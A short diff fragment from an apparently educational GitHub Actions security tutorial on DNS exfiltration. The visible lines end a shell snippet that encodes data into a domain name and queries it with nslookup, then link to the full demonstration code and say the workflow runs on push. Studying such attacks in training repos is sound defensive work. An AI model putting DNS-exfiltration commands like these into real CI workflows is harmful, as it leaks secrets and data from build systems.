step-security/github-actions-goat/DNSExfiltration.md

           domain=${domain//\//-}
           nslookup "${domain}"
     ```
+    For a seamless experience, StepSecurity recommends copying the full code from [here](https://github.com/step-security/supply-chain-goat/blob/main/sourcecodes/tut1/p8.md) and replacing the previous text entirely.

 9. This change should cause the workflow to run, as it is set to run on push.